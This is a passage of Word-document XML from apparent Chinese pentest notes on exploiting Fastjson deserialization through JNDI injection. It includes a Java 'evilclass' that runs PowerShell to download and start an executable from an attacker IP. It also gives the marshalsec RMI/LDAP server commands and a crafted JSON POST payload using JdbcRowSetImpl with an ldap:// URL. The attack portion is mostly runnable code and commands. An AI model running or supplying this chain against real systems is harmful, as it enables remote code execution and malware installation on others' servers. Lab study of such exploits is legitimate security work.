        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E61BF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>// do nothing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D678A85" w14:textId="77777777" w:rsidR="005E61BF" w:rsidRPr="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E61BF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1839EC68" w14:textId="77777777" w:rsidR="005E61BF" w:rsidRPr="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E61BF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B384FA1" w14:textId="012F0E54" w:rsidR="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005E61BF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB85C34" w14:textId="77777777" w:rsidR="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="667179CE" w14:textId="0138D634" w:rsidR="002B4A9B" w:rsidRDefault="002B4A9B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r w:rsidR="003B544C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反弹</w:t>
      </w:r>
      <w:r w:rsidR="003B544C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47004FCF" w14:textId="77777777" w:rsidR="002B4A9B" w:rsidRPr="002B4A9B" w:rsidRDefault="002B4A9B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B4A9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>import java.lang.Runtime;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7202A01F" w14:textId="77777777" w:rsidR="002B4A9B" w:rsidRPr="002B4A9B" w:rsidRDefault="002B4A9B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B4A9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>import java.lang.Process;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C5C2FD" w14:textId="77777777" w:rsidR="002B4A9B" w:rsidRPr="002B4A9B" w:rsidRDefault="002B4A9B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B4A9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>public class evilclass{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D65C51" w14:textId="77777777" w:rsidR="002B4A9B" w:rsidRPr="002B4A9B" w:rsidRDefault="002B4A9B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B4A9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>static {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A08BA8" w14:textId="77777777" w:rsidR="002B4A9B" w:rsidRPr="002B4A9B" w:rsidRDefault="002B4A9B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B4A9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1A8C04" w14:textId="77777777" w:rsidR="002B4A9B" w:rsidRPr="002B4A9B" w:rsidRDefault="002B4A9B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B4A9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Runtime rt = Runtime.getRuntime();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7A4314" w14:textId="77777777" w:rsidR="002B4A9B" w:rsidRPr="002B4A9B" w:rsidRDefault="002B4A9B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B4A9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>String[] commands = {"powershell", "-Command", "(new-object System.Net.WebClient).DownloadFile('http://192.168.112.146/xigua.exe','xigua.exe');start-process xigua.exe"};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6C3700" w14:textId="77777777" w:rsidR="002B4A9B" w:rsidRPr="002B4A9B" w:rsidRDefault="002B4A9B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B4A9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Process pc = rt.exec(commands);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E86C195" w14:textId="77777777" w:rsidR="002B4A9B" w:rsidRPr="002B4A9B" w:rsidRDefault="002B4A9B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B4A9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>pc.waitFor();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BD4F04" w14:textId="77777777" w:rsidR="002B4A9B" w:rsidRPr="002B4A9B" w:rsidRDefault="002B4A9B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B4A9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>} catch (Exception e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538D16C8" w14:textId="77777777" w:rsidR="002B4A9B" w:rsidRPr="002B4A9B" w:rsidRDefault="002B4A9B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B4A9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>// do nothing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AFD7B0" w14:textId="77777777" w:rsidR="002B4A9B" w:rsidRPr="002B4A9B" w:rsidRDefault="002B4A9B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B4A9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F25D66" w14:textId="77777777" w:rsidR="002B4A9B" w:rsidRPr="002B4A9B" w:rsidRDefault="002B4A9B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B4A9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5639159B" w14:textId="26F5B918" w:rsidR="002B4A9B" w:rsidRDefault="002B4A9B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002B4A9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5621B156" w14:textId="77777777" w:rsidR="002B4A9B" w:rsidRDefault="002B4A9B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="726B7DAE" w14:textId="221BB704" w:rsidR="00E42678" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31752CC0" w14:textId="108CB0BC" w:rsidR="005E61BF" w:rsidRDefault="00D94768" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D94768">
        <w:t>javac evilclass.java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C4FC9D" w14:textId="77777777" w:rsidR="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01F30397" w14:textId="391C424E" w:rsidR="00643EEE" w:rsidRDefault="00643EEE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F729E1" w14:textId="772561F1" w:rsidR="00E42678" w:rsidRDefault="00107755" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00107755">
        <w:t>python -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC655D0" w14:textId="77777777" w:rsidR="00010090" w:rsidRDefault="00010090" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CD4C4AD" w14:textId="0B2720EC" w:rsidR="00010090" w:rsidRDefault="00010090" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B962BC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
      <w:r w:rsidRPr="00B962BC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r w:rsidRPr="00B962BC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>服务：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2529769B" w14:textId="1CCD477E" w:rsidR="00010090" w:rsidRDefault="002A6889" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B962BC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.112.146/#evilclass" 9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2028405F" w14:textId="291B3096" w:rsidR="00643EEE" w:rsidRDefault="004C3627" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B962BC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B962BC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>marshalsec</w:t>
      </w:r>
      <w:r w:rsidRPr="00B962BC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>搭建</w:t>
      </w:r>
      <w:r w:rsidRPr="00B962BC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>LDAP</w:t>
      </w:r>
      <w:r w:rsidRPr="00B962BC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
      <w:r w:rsidR="0012448A" w:rsidRPr="00B962BC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A2BE80" w14:textId="2E3650F0" w:rsidR="006328F7" w:rsidRDefault="00932BDD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B962BC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.112.146/#evilclass" 9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B6BCBA" w14:textId="77777777" w:rsidR="00A038F0" w:rsidRDefault="00A038F0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20BD692A" w14:textId="77777777" w:rsidR="00A038F0" w:rsidRDefault="00A038F0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28584E6E" w14:textId="77777777" w:rsidR="00A038F0" w:rsidRDefault="00A038F0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07F337F1" w14:textId="417E904F" w:rsidR="00860ED1" w:rsidRDefault="00860ED1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Burp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改参数如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1074DCE5" w14:textId="77777777" w:rsidR="00860ED1" w:rsidRPr="00860ED1" w:rsidRDefault="00860ED1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00860ED1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>POST /fastjson HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4B04BF" w14:textId="77777777" w:rsidR="00860ED1" w:rsidRPr="00860ED1" w:rsidRDefault="00860ED1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00860ED1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Host: 192.168.112.140:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F01FF22" w14:textId="77777777" w:rsidR="00860ED1" w:rsidRPr="00860ED1" w:rsidRDefault="00860ED1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00860ED1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA59CFC" w14:textId="77777777" w:rsidR="00860ED1" w:rsidRPr="00860ED1" w:rsidRDefault="00860ED1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00860ED1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E843D05" w14:textId="77777777" w:rsidR="00860ED1" w:rsidRPr="00860ED1" w:rsidRDefault="00860ED1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00860ED1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Accept-Language: en-US,en;q=0.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1225E1FB" w14:textId="77777777" w:rsidR="00860ED1" w:rsidRPr="00860ED1" w:rsidRDefault="00860ED1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00860ED1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Accept-Encoding: gzip, deflate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525B02A5" w14:textId="77777777" w:rsidR="00860ED1" w:rsidRPr="00860ED1" w:rsidRDefault="00860ED1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00860ED1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08815115" w14:textId="77777777" w:rsidR="00860ED1" w:rsidRPr="00860ED1" w:rsidRDefault="00860ED1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00860ED1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Upgrade-Insecure-Requests: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64103DA3" w14:textId="77777777" w:rsidR="00860ED1" w:rsidRPr="00860ED1" w:rsidRDefault="00860ED1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00860ED1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Content-Type: application/json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E197A18" w14:textId="77777777" w:rsidR="00860ED1" w:rsidRPr="00860ED1" w:rsidRDefault="00860ED1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00860ED1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Content-Length: 133</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126DC96E" w14:textId="77777777" w:rsidR="00860ED1" w:rsidRPr="00860ED1" w:rsidRDefault="00860ED1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00860ED1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D54B38" w14:textId="77777777" w:rsidR="00860ED1" w:rsidRPr="00860ED1" w:rsidRDefault="00860ED1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00860ED1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B3570B" w14:textId="77777777" w:rsidR="00860ED1" w:rsidRPr="00860ED1" w:rsidRDefault="00860ED1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00860ED1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>"@type":"com.sun.rowset.JdbcRowSetImpl",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001F2794" w14:textId="77777777" w:rsidR="00860ED1" w:rsidRPr="00860ED1" w:rsidRDefault="00860ED1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00860ED1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>"dataSourceName":"ldap://192.168.112.146:9999/evilclass",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463DFF6E" w14:textId="77777777" w:rsidR="00860ED1" w:rsidRPr="00860ED1" w:rsidRDefault="00860ED1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00860ED1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>"autoCommit":true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8698B1" w14:textId="537CEE50" w:rsidR="00860ED1" w:rsidRDefault="00860ED1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00860ED1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D149668" w14:textId="77777777" w:rsidR="00C20D76" w:rsidRDefault="00C20D76" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F7651DA" w14:textId="77777777" w:rsidR="006655D4" w:rsidRDefault="006655D4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A8C23A3" w14:textId="03B18109" w:rsidR="006655D4" w:rsidRDefault="00B579B6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JNDI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程攻击：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jndi</w:t>
      </w:r>
      <w:r>
        <w:t>_tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E906AA" w14:textId="77777777" w:rsidR="00B579B6" w:rsidRDefault="00B579B6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A57B333" w14:textId="049BC8E2" w:rsidR="00B579B6" w:rsidRDefault="00103BC4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00103BC4">
        <w:t>https://github.com/wyzxxz/jndi_tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1155F5" w14:textId="77777777" w:rsidR="00B579B6" w:rsidRDefault="00B579B6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EFC9D36" w14:textId="6BDBE546" w:rsidR="0081692A" w:rsidRDefault="00732AE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:r>
        <w:t>nd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rmi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>区别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CE3483" w14:textId="77777777" w:rsidR="0081692A" w:rsidRDefault="0081692A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="450435F7" w14:textId="3655FB06" w:rsidR="00732AE6" w:rsidRDefault="006D216B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="006D216B">
        <w:t>https://xz.aliyun.com/t/11967</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAA3F9F" w14:textId="77777777" w:rsidR="00732AE6" w:rsidRDefault="00732AE6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="742DABC9" w14:textId="4EC0E261" w:rsidR="00732AE6" w:rsidRDefault="000715AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以理解为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JNDI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本身就是为了远程调用而包装的一层，</w:t>
      </w:r>
      <w:r w:rsidR="007D6EAF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r w:rsidR="007D6EAF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是单纯的进行</w:t>
      </w:r>
      <w:r w:rsidR="007D6EAF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidR="007D6EAF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程调用，故</w:t>
      </w:r>
      <w:r w:rsidR="007D6EAF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
